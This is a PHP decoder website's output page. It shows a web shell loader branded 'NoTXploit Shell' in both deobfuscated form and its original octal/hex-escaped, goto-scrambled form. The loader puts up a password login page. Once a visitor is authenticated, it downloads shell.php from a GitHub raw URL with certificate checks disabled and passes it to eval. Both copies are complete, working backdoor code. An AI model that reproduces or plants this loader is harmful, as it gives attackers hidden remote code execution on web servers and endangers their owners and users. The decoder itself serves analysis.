Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto xM_cX; xM_cX: session_start(); goto VxfHQ; QJNN0: if (is_logged_in()) { $a = ..

Decoded Output download

<?php 
 goto xM_cX; xM_cX: session_start(); goto VxfHQ; QJNN0: if (is_logged_in()) { $a = geturlsinfo("https://raw.githubusercontent.com/notmuzakki/NoTFinder/refs/heads/main/shell.php"); eval("?>" . $a); } else { ?> 
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><meta content="width=device-width,initial-scale=1"name="viewport"><title>[ Notxploit Login ]</title><style>@import url(https://fonts.googleapis.com/css2?family=New+Rocker&display=swap);body{font-family:Arial,sans-serif;margin:0;padding:0;display:flex;justify-content:center;align-items:center;height:100vh;background:url(https://od.lk/s/NV8yMDEwODUxOTVf/1341150.png) no-repeat center center fixed;background-size:cover}.login-container{padding:20px 30px;border-radius:10px;box-shadow:0 4px 10px rgba(255,255,255,.366);text-align:center;width:300px}.login-container h2{font-family:"New Rocker",serif;margin-bottom:20px;color:#fff}.login-container form{display:flex;flex-direction:column;gap:15px}.login-container input[type=password]{padding:10px;font-size:14px;border:1px solid #ccc;border-radius:5px;outline:0;transition:border-color .3s}.login-container input[type=password]:focus{border-color:#3c3c3c}.login-container input[type=submit]{background:#910b0b;color:#fff;border:none;border-radius:5px;padding:10px;font-size:16px;cursor:pointer;transition:background-color .3s}.login-container input[type=submit]:hover{background:#494949}.error-message{color:red;font-size:14px}</style></head><body><div class="login-container"><h2>./NoTXploit Shell</h2><?php  if (isset($error)) { echo "<p class='error-message'>{$error}</p>"; } ?> 
<form action="<?php  echo $_SERVER["PHP_SELF"]; ?> 
"method="post"><input type="password"id="password"name="password"placeholder="Enter your password"> <input type="submit"value="Login"></form></div></body></html><?php  } goto WlVZx; NRKEU: function is_logged_in() { return isset($_SESSION["logged_in"]) && $_SESSION["logged_in"] === true; } goto gFs9S; gFs9S: if (isset($_POST["password"])) { $entered_password = $_POST["password"]; $hashed_password = "$2y$10$5cSEil7MBDmc7x1IbnCHF.SQvByGqNVO1tQ2mfYiw3wxE96R9X0ve"; if (password_verify($entered_password, $hashed_password)) { $_SESSION["logged_in"] = true; $_SESSION["asu"] = "hai"; } else { $error = "Incorrect password. Please try again."; } } goto QJNN0; VxfHQ: function geturlsinfo($url) { if (function_exists("curl_exec")) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["asu"])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION["asu"]); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists("file_get_contents")) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists("fopen") && function_exists("stream_get_contents")) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } goto NRKEU; WlVZx: ?> 

Did this file decode correctly?

Original Code

<?php
 goto xM_cX; xM_cX: session_start(); goto VxfHQ; QJNN0: if (is_logged_in()) { $a = geturlsinfo("\150\x74\164\160\x73\72\57\57\x72\x61\167\56\147\151\164\150\165\142\165\163\145\x72\x63\157\x6e\164\145\x6e\x74\x2e\143\157\x6d\x2f\x6e\x6f\x74\x6d\x75\x7a\x61\153\x6b\151\57\116\157\124\x46\151\156\144\145\162\x2f\162\145\146\x73\57\x68\145\141\x64\163\x2f\155\141\x69\156\57\x73\150\x65\x6c\x6c\x2e\160\150\x70"); eval("\77\x3e" . $a); } else { ?>
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><meta content="width=device-width,initial-scale=1"name="viewport"><title>[ Notxploit Login ]</title><style>@import url(https://fonts.googleapis.com/css2?family=New+Rocker&display=swap);body{font-family:Arial,sans-serif;margin:0;padding:0;display:flex;justify-content:center;align-items:center;height:100vh;background:url(https://od.lk/s/NV8yMDEwODUxOTVf/1341150.png) no-repeat center center fixed;background-size:cover}.login-container{padding:20px 30px;border-radius:10px;box-shadow:0 4px 10px rgba(255,255,255,.366);text-align:center;width:300px}.login-container h2{font-family:"New Rocker",serif;margin-bottom:20px;color:#fff}.login-container form{display:flex;flex-direction:column;gap:15px}.login-container input[type=password]{padding:10px;font-size:14px;border:1px solid #ccc;border-radius:5px;outline:0;transition:border-color .3s}.login-container input[type=password]:focus{border-color:#3c3c3c}.login-container input[type=submit]{background:#910b0b;color:#fff;border:none;border-radius:5px;padding:10px;font-size:16px;cursor:pointer;transition:background-color .3s}.login-container input[type=submit]:hover{background:#494949}.error-message{color:red;font-size:14px}</style></head><body><div class="login-container"><h2>./NoTXploit Shell</h2><?php  if (isset($error)) { echo "\74\160\40\143\x6c\x61\x73\163\x3d\x27\x65\162\162\x6f\x72\x2d\155\145\x73\x73\141\147\145\47\x3e{$error}\x3c\x2f\160\76"; } ?>
<form action="<?php  echo $_SERVER["\120\110\120\x5f\123\105\114\106"]; ?>
"method="post"><input type="password"id="password"name="password"placeholder="Enter your password"> <input type="submit"value="Login"></form></div></body></html><?php  } goto WlVZx; NRKEU: function is_logged_in() { return isset($_SESSION["\x6c\x6f\x67\x67\x65\144\x5f\x69\156"]) && $_SESSION["\x6c\x6f\x67\147\145\144\x5f\x69\156"] === true; } goto gFs9S; gFs9S: if (isset($_POST["\x70\141\x73\x73\x77\157\162\144"])) { $entered_password = $_POST["\x70\x61\x73\x73\167\157\x72\x64"]; $hashed_password = "\x24\x32\x79\x24\61\x30\44\x35\x63\123\x45\151\154\x37\115\102\104\155\143\x37\x78\61\x49\142\156\103\110\x46\x2e\x53\121\x76\102\171\x47\x71\x4e\x56\x4f\x31\x74\x51\x32\x6d\x66\x59\151\x77\x33\167\x78\x45\x39\66\122\x39\x58\x30\x76\145"; if (password_verify($entered_password, $hashed_password)) { $_SESSION["\x6c\157\147\147\x65\x64\137\151\x6e"] = true; $_SESSION["\141\163\165"] = "\x68\141\x69"; } else { $error = "\x49\x6e\x63\x6f\x72\x72\145\143\164\x20\x70\x61\163\163\167\x6f\x72\x64\x2e\40\x50\154\145\141\x73\145\40\x74\x72\x79\40\141\147\x61\151\156\x2e"; } } goto QJNN0; VxfHQ: function geturlsinfo($url) { if (function_exists("\143\165\162\x6c\x5f\x65\x78\145\143")) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "\x4d\157\x7a\151\x6c\x6c\x61\x2f\65\56\60\40\50\127\151\x6e\144\157\x77\x73\x20\116\x54\x20\x36\x2e\61\x3b\x20\x72\x76\x3a\63\x32\x2e\60\x29\40\107\145\x63\x6b\x6f\x2f\x32\x30\x31\60\x30\x31\60\x31\x20\106\151\x72\x65\x66\x6f\170\x2f\63\x32\56\60"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["\141\x73\x75"])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION["\x61\163\165"]); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists("\146\151\154\145\137\147\145\x74\x5f\x63\x6f\156\164\145\x6e\x74\x73")) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists("\x66\x6f\x70\x65\x6e") && function_exists("\x73\x74\162\145\141\155\137\x67\145\164\x5f\143\x6f\156\164\x65\156\164\163")) { $handle = fopen($url, "\x72"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } goto NRKEU; WlVZx: ?>

Function Calls

None

Variables

None

Stats

MD5 351af6cdd6688fca4e77facfd9c9a1ca
Eval Count 0
Decode Time 56 ms